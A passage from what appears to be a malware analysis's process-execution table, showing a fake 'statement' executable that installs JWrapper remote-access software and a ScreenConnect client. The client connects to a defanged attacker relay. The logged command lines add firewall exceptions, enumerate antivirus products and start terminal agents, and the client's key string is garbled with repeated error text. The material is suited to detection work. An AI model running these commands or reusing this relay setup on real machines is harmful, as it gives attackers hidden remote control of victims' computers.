wmic.exe |
C:\Windows\system32\cmd.exe /c C:\Windows\System32\wbem\wmic.exe.bak /namespace:\\root\SecurityCenter2 PATH AntiVirusProduct get |
| elev_win.exe |
elev_win.exe |
“C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\elev_win.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\windowslauncher.exe” “-cp” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwrapper_utils.jar;C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\customer.jar” “-Dsun.java2d.dpiaware=true” “-Djava.library.path=C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete” “com.aem.sdesktop.util.MouseMover” “127.0.0.1” “56936” “127.0.0.1” “56937” “elevated” |
| elev_win.exe |
session_win.exe |
“C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\elev_win.exe” “–mouselocation” |
| msiexec.exe |
Remote Access.exe |
msiexec.exe /i sc.msi /qn |
| msiexec.exe |
services.exe |
C:\Windows\system32\msiexec.exe /V |
| msiexec.exe |
msiexec.exe |
C:\Windows\syswow64\MsiExec.exe -Embedding 975E1E24ECB9F562B809F458594D14A3 E Global\MSI0000 |
| netsh.exe |
Remote Access.exe |
netsh wlan show interfaces |
| netsh.exe |
cmd.exe |
netsh advfirewall show all State |
| netsh.exe |
Remote Access.exe |
netsh.exe firewall add allowedprogram “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\java.exe” “SHRemoteAccessServiceJE_2” ENABLE |
| netsh.exe |
Remote Access.exe |
netsh.exe firewall add allowedprogram “C:\ProgramData\JWrapper-Remote Access\Remote AccessWinLauncher.exe” “SHRemoteAccessServiceMA_1” ENABLE |
| netsh.exe |
Remote Access.exe |
netsh.exe firewall add allowedprogram “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access.exe” “SHRemoteAccessServiceJE_4” ENABLE |
| netsh.exe |
Remote Access.exe |
netsh.exe firewall add allowedprogram “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote AccessECompatibility.exe” “SHRemoteAccessServiceJE_5” ENABLE |
| netsh.exe |
Remote Access.exe |
netsh.exe firewall add allowedprogram “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote AccessLauncher.exe” “SHRemoteAccessServiceJE_6” ENABLE |
| netsh.exe |
Remote Access.exe |
netsh.exe firewall add allowedprogram “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\javaw.exe” “SHRemoteAccessServiceJE_3” ENABLE |
| netsh.exe |
Remote Access.exe |
netsh.exe firewall add allowedprogram “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\java-rmi.exe” “SHRemoteAccessServiceJE_1” ENABLE |
| netsh.exe |
Remote Access.exe |
netsh.exe firewall add allowedprogram “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleGatewayService\StopSimpleGatewayService.exe” “SHRemoteAccessServiceSH_3_2” ENABLE |
| netsh.exe |
Remote Access.exe |
netsh.exe firewall add allowedprogram “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleGatewayService\SimpleGatewayService.exe” “SHRemoteAccessServiceSH_3_1” ENABLE |
| netsh.exe |
Remote Access.exe |
netsh.exe firewall add allowedprogram “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\windowslauncher.exe” “SHRemoteAccessServiceJE_7” ENABLE |
| Remote |
session_win.exe |
“C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access Monitoring.exe” “-cp” “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\jwrapperlib/jwstandalonelaunch.jar” “-Xmx256m” “-XX:MinHeapFreeRatio=15” “-XX:MaxHeapFreeRatio=30” “-XX:MaxGCPauseMillis=500” “-Djava.util.Arrays.useLegacyMergeSort=true” “-Djava.net.preferIPv4Stack=true” “-Dapple.awt.UIElement=true” “-Xrs” “-Dsun.java2d.dpiaware=true” “-Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2” “jwrapper.updater.GenericUpdaterLaunch” “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\JWLaunchProperties-1777397243979-20” |
| Remote |
SimpleGatewayService.exe |
“C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access.exe” “-Xmx256m” “-XX:MinHeapFreeRatio=15” “-XX:MaxHeapFreeRatio=30” “-XX:MaxGCPauseMillis=500” “-Djava.util.Arrays.useLegacyMergeSort=true” “-Djava.net.preferIPv4Stack=true” “-Dapple.awt.UIElement=true” “-Xrs” “-Dsun.java2d.dpiaware=true” “-Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2” “-cp” “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\jwrapperlib\jwstandalonelaunch.jar” “jwrapper.updater.GenericUpdaterLaunch” “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\JWLaunchProperties-3575002851-22” |
| Remote |
statement5648.exe |
“C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote AccessECompatibility.exe” -cp “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396476830-7\customer.jar;C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396476830-7\jwrapper_utils.jar” -Xmx256m -XX:MinHeapFreeRatio=15 -XX:MaxHeapFreeRatio=30 -XX:MaxGCPauseMillis=500 -Djava.util.Arrays.useLegacyMergeSort=true -Djava.net.preferIPv4Stack=true -Dapple.awt.UIElement=true -Xrs -Dsun.java2d.dpiaware=true -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 jwrapper.JWrapper “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396476830-7\JWLaunchProperties-1777396484051-30” |
| Remote |
session_win.exe |
“C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access Monitoring.exe” “-cp” “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\jwrapperlib/jwstandalonelaunch.jar” “-Xmx256m” “-XX:MinHeapFreeRatio=15” “-XX:MaxHeapFreeRatio=30” “-XX:MaxGCPauseMillis=500” “-Djava.util.Arrays.useLegacyMergeSort=true” “-Djava.net.preferIPv4Stack=true” “-Dapple.awt.UIElement=true” “-Xrs” “-Dsun.java2d.dpiaware=true” “-Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2” “jwrapper.updater.GenericUpdaterLaunch” “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\JWLaunchProperties-1777396698592-20” |
| Remote |
session_win.exe |
“C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access.exe” “-cp” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\customer.jar;C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwrapper_utils.jar” “-Xmx256m” “-XX:MinHeapFreeRatio=15” “-XX:MaxHeapFreeRatio=30” “-XX:MaxGCPauseMillis=500” “-Djava.util.Arrays.useLegacyMergeSort=true” “-Djava.net.preferIPv4Stack=true” “-Dapple.awt.UIElement=true” “-Xrs” “-Dsun.java2d.dpiaware=true” “-Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2” “jwrapper.JWrapper” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\JWLaunchProperties-1777396701404-39” |
| Remote |
session_win.exe |
“C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access.exe” “-cp” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\customer.jar;C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwrapper_utils.jar” “-Xmx256m” “-XX:MinHeapFreeRatio=15” “-XX:MaxHeapFreeRatio=30” “-XX:MaxGCPauseMillis=500” “-Djava.util.Arrays.useLegacyMergeSort=true” “-Djava.net.preferIPv4Stack=true” “-Dapple.awt.UIElement=true” “-Xrs” “-Dsun.java2d.dpiaware=true” “-Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2” “jwrapper.JWrapper” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\JWLaunchProperties-1777397247043-39” |
| Remote |
session_win.exe |
“C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access Monitoring.exe” “-cp” “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\jwrapperlib/jwstandalonelaunch.jar” “-Xmx256m” “-XX:MinHeapFreeRatio=15” “-XX:MaxHeapFreeRatio=30” “-XX:MaxGCPauseMillis=500” “-Djava.util.Arrays.useLegacyMergeSort=true” “-Djava.net.preferIPv4Stack=true” “-Dapple.awt.UIElement=true” “-Xrs” “-Dsun.java2d.dpiaware=true” “-Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2” “jwrapper.updater.GenericUpdaterLaunch” “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\JWLaunchProperties-1777396515581-20” |
| Remote |
session_win.exe |
“C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access.exe” “-cp” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\customer.jar;C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwrapper_utils.jar” “-Xmx256m” “-XX:MinHeapFreeRatio=15” “-XX:MaxHeapFreeRatio=30” “-XX:MaxGCPauseMillis=500” “-Djava.util.Arrays.useLegacyMergeSort=true” “-Djava.net.preferIPv4Stack=true” “-Dapple.awt.UIElement=true” “-Xrs” “-Dsun.java2d.dpiaware=true” “-Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2” “jwrapper.JWrapper” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\JWLaunchProperties-1777396518842-39” |
| Remote |
statement5648.exe |
“C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access.exe” -cp “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\customer.jar;C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwrapper_utils.jar” -Xmx256m -XX:MinHeapFreeRatio=15 -XX:MaxHeapFreeRatio=30 -XX:MaxGCPauseMillis=500 -Djava.util.Arrays.useLegacyMergeSort=true -Djava.net.preferIPv4Stack=true -Dapple.awt.UIElement=true -Xrs -Dsun.java2d.dpiaware=true -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 jwrapper.JWrapper “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\JWLaunchProperties-1777396488207-33” |
| Remote |
statement5648.exe |
“C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote AccessLauncher.exe” -cp “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\customer.jar;C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwrapper_utils.jar” -Xmx256m -XX:MinHeapFreeRatio=15 -XX:MaxHeapFreeRatio=30 -XX:MaxGCPauseMillis=500 -Djava.util.Arrays.useLegacyMergeSort=true -Djava.net.preferIPv4Stack=true -Dapple.awt.UIElement=true -Xrs -Dsun.java2d.dpiaware=true -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 jwrapper.JWrapper “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\JWLaunchProperties-1777396485879-32” |
| rundll32.exe |
msiexec.exe |
rundll32.exe “C:\Windows\Installer\MSI4209.tmp”,zzzzInvokeManagedCustomActionOutOfProc SfxCA_56509750 2 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments |
| ScreenConnect.ClientService.exe |
services.exe |
“C:\Program Files (x86)\ScreenConnect Client (adbce2b92cb435b3)\ScreenConnect.ClientService.exe” “?e=Access&y=Guest&h=sslzeromail[.]run.place&p=8041&s=1063c106-fb78-4a61-a1c3-959620aa0d1e&k=BgIAAACkAABSU0ExAAgAAAEAAQAtB7xpgSSY0vmCVpwxcuZIThe system cannot find the file specified. fax8SzUK6ZHTngAMzp7yIqVypKK1lThe system cannot find the file specified. bwoyeosThe system cannot find the file specified. b5yThe system cannot find the file specified. fXThe system cannot find the file specified. bEcYDldPOGOThe system cannot find the file specified. b3BseeSeaeo44ykXwdThe system cannot find the file specified. blThe system cannot find the file specified. fa8k24jRIn74Gp2The system cannot find the file specified. b6qNTThe system cannot find the file specified. bpaZaHOThe system cannot find the file specified. fbUva6NBdH5pUcuaDkXzZywacRkvVQa8BOn3uumi7zc0IO44QZboES72PcThe system cannot find the file specified. frxJcuAMThe system cannot find the file specified. f65GGaOEJ4x8ilqcKaquAr0uKFGbaglfYDyCV8kqRaw2L1ucF3The system cannot find the file specified. b22DuwyIwzXd5HwpBsq94euEbHbtNMk4QThe system cannot find the file specified. fDThe system cannot find the file specified. fefxQBPwDqhjWThe system cannot find the file specified. bW2NU99bR16tNqqMbeolXIToecThe system cannot find the file specified. bB9CZ9abJuZES6ULML512IN3phqQZKv&t=&c=crypto&c=&c=&c=&c=&c=&c=&c=” |
| ScreenConnect.WindowsClient.exe |
ScreenConnect.ClientService.exe |
“C:\Program Files (x86)\ScreenConnect Client (adbce2b92cb435b3)\ScreenConnect.WindowsClient.exe” “RunRole” “87140605-5d2c-4a7d-9c4a-781ac7f07691” “System” |
| ScreenConnect.WindowsClient.exe |
ScreenConnect.ClientService.exe |
“C:\Program Files (x86)\ScreenConnect Client (adbce2b92cb435b3)\ScreenConnect.WindowsClient.exe” “RunRole” “0d393de2-f5aa-4318-9563-b659faff1a49” “System” |
| ScreenConnect.WindowsClient.exe |
ScreenConnect.ClientService.exe |
“C:\Program Files (x86)\ScreenConnect Client (adbce2b92cb435b3)\ScreenConnect.WindowsClient.exe” “RunRole” “9dad62c5-42a7-4f31-b383-22ecbad23c7a” “System” |
| ScreenConnect.WindowsClient.exe |
ScreenConnect.ClientService.exe |
“C:\Program Files (x86)\ScreenConnect Client (adbce2b92cb435b3)\ScreenConnect.WindowsClient.exe” “RunRole” “426d2985-183b-4d41-9abc-f24af794a2db” “User” |
| ScreenConnect.WindowsClient.exe |
ScreenConnect.ClientService.exe |
“C:\Program Files (x86)\ScreenConnect Client (adbce2b92cb435b3)\ScreenConnect.WindowsClient.exe” “RunRole” “f00ff167-e6f2-44ad-9ccb-e30f6906d0f2” “System” |
| ScreenConnect.WindowsClient.exe |
ScreenConnect.ClientService.exe |
“C:\Program Files (x86)\ScreenConnect Client (adbce2b92cb435b3)\ScreenConnect.WindowsClient.exe” “RunRole” “1c5eeb04-e194-44a1-b466-87bab51ce23f” “System” |
| ScreenConnect.WindowsClient.exe |
ScreenConnect.ClientService.exe |
“C:\Program Files (x86)\ScreenConnect Client (adbce2b92cb435b3)\ScreenConnect.WindowsClient.exe” “RunRole” “add529c0-e532-4f23-84dd-6671686c303e” “System” |
| SecurityHealthSystray.exe |
explorer.exe |
“C:\Windows\System32\SecurityHealthSystray.exe” |
| session_win.exe |
Remote Access.exe |
“C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\session_win.exe” –slWaitForCompletion “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\elev_win.exe” –mouselocation |
| session_win.exe |
Remote Access Monitoring.exe |
“C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\session_win.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access.exe” -cp “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\customer.jar;C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwrapper_utils.jar” -Xmx256m -XX:MinHeapFreeRatio=15 -XX:MaxHeapFreeRatio=30 -XX:MaxGCPauseMillis=500 -Djava.util.Arrays.useLegacyMergeSort=true -Djava.net.preferIPv4Stack=true -Dapple.awt.UIElement=true -Xrs -Dsun.java2d.dpiaware=true -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 jwrapper.JWrapper “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\JWLaunchProperties-1777396518842-39” |
| session_win.exe |
Remote Access Monitoring.exe |
“C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\session_win.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access.exe” -cp “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\customer.jar;C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwrapper_utils.jar” -Xmx256m -XX:MinHeapFreeRatio=15 -XX:MaxHeapFreeRatio=30 -XX:MaxGCPauseMillis=500 -Djava.util.Arrays.useLegacyMergeSort=true -Djava.net.preferIPv4Stack=true -Dapple.awt.UIElement=true -Xrs -Dsun.java2d.dpiaware=true -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 jwrapper.JWrapper “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\JWLaunchProperties-1777396701404-39” |
| session_win.exe |
Remote Access.exe |
“C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\session_win.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access Monitoring.exe” -cp “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\jwrapperlib/jwstandalonelaunch.jar” -Xmx256m -XX:MinHeapFreeRatio=15 -XX:MaxHeapFreeRatio=30 -XX:MaxGCPauseMillis=500 -Djava.util.Arrays.useLegacyMergeSort=true -Djava.net.preferIPv4Stack=true -Dapple.awt.UIElement=true -Xrs -Dsun.java2d.dpiaware=true -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 jwrapper.updater.GenericUpdaterLaunch “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\JWLaunchProperties-1777397243979-20” |
| session_win.exe |
Remote Access Monitoring.exe |
“C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\session_win.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access.exe” -cp “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\customer.jar;C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwrapper_utils.jar” -Xmx256m -XX:MinHeapFreeRatio=15 -XX:MaxHeapFreeRatio=30 -XX:MaxGCPauseMillis=500 -Djava.util.Arrays.useLegacyMergeSort=true -Djava.net.preferIPv4Stack=true -Dapple.awt.UIElement=true -Xrs -Dsun.java2d.dpiaware=true -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 jwrapper.JWrapper “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\JWLaunchProperties-1777397247043-39” |
| session_win.exe |
Remote Access.exe |
“C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\session_win.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access Monitoring.exe” -cp “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\jwrapperlib/jwstandalonelaunch.jar” -Xmx256m -XX:MinHeapFreeRatio=15 -XX:MaxHeapFreeRatio=30 -XX:MaxGCPauseMillis=500 -Djava.util.Arrays.useLegacyMergeSort=true -Djava.net.preferIPv4Stack=true -Dapple.awt.UIElement=true -Xrs -Dsun.java2d.dpiaware=true -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 jwrapper.updater.GenericUpdaterLaunch “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\JWLaunchProperties-1777396515581-20” |
| session_win.exe |
Remote Access.exe |
“C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\session_win.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\Remote Access Monitoring.exe” -cp “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\jwrapperlib/jwstandalonelaunch.jar” -Xmx256m -XX:MinHeapFreeRatio=15 -XX:MaxHeapFreeRatio=30 -XX:MaxGCPauseMillis=500 -Djava.util.Arrays.useLegacyMergeSort=true -Djava.net.preferIPv4Stack=true -Dapple.awt.UIElement=true -Xrs -Dsun.java2d.dpiaware=true -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 jwrapper.updater.GenericUpdaterLaunch “C:\ProgramData\JWrapper-Remote Access\JWrapper-JWrapper-00052861018-complete\JWLaunchProperties-1777396698592-20” |
| SimpleGatewayService.exe |
SimpleService.exe |
“C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleGatewayService\SimpleGatewayService.exe” |
| SimpleService.exe |
Remote Access.exe |
“C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleService.exe” -uninstall “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleGatewayService\simplegateway.service” |
| SimpleService.exe |
Remote Access.exe |
“C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleService.exe” -install “C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleGatewayService\simplegateway.service” |
| SimpleService.exe |
services.exe |
“C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\SimpleService.exe” |
| statement5648.exe |
explorer.exe |
“C:\Users\###########\Downloads\statement5648.exe” |
| unpack200.exe |
statement5648.exe |
“C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\bin\unpack200.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\ext\jaccess.jar.p2” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\ext\jaccess.jar” |
| unpack200.exe |
statement5648.exe |
“C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\bin\unpack200.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\rt.jar.p2” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\rt.jar” |
| unpack200.exe |
statement5648.exe |
“C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\bin\unpack200.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\jsse.jar.p2” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\jsse.jar” |
| unpack200.exe |
statement5648.exe |
“C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\bin\unpack200.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\ext\access-bridge-64.jar.p2” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\ext\access-bridge-64.jar” |
| unpack200.exe |
statement5648.exe |
“C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\bin\unpack200.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\ext\sunec.jar.p2” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\ext\sunec.jar” |
| unpack200.exe |
statement5648.exe |
“C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\bin\unpack200.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\alt-rt.jar.p2” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\alt-rt.jar” |
| unpack200.exe |
statement5648.exe |
“C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\bin\unpack200.exe” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\ext\sunmscapi.jar.p2” “C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\lib\ext\sunmscapi.jar” |
| windowslauncher.exe |
windowslauncher.exe |
“C:\ProgramData\JWrapper-Remote Access\JWrapper-Windows64JRE-00052234686-complete\bin\windowslauncher.exe” -cp “C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\customer.jar;C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\jwrapper_utils.jar” -Dsun.java2d.dpiaware=true “-Djava.library.path=C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete” com.aem.sdesktop.util.MouseMover 127.0.0.1 56940 127.0.0.1 56941 elevated_backup |
| windowslauncher.exe |
statement5648.exe |
“C:\ProgramData\JWrapper-Remote Access\JWrapperTemp-1777396455-7-app\bin\windowslauncher.exe” “-Xshare:dump” |
| wmic.exe |
Remote Access.exe |
wmic.exe /namespace:\\root\SecurityCenter2 PATH FirewallProduct get |
| wmic.exe |
Remote Access.exe |
wmic.exe /namespace:\\root\SecurityCenter2 PATH AntiVirusProduct get |
| wmic.exe |
Remote Access.exe |
wmic.exe /namespace:\\root\SecurityCenter2 PATH AntiSpywareProduct get |
| winpty-agent64.exe |
Remote Access.exe |
“C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\winpty-agent64.exe” \\.\pipe\winpty-14832-1-control \\.\pipe\winpty-14832-1-data 80 40 |
| winpty-agent64.exe |
Remote Access.exe |
“C:\ProgramData\JWrapper-Remote Access\JWrapper-Remote Access-00052861074-complete\winpty-agent64.exe” \\.\pipe\winpty-2044-1-control \\.\pipe\winpty-2044-1-data 80 40 |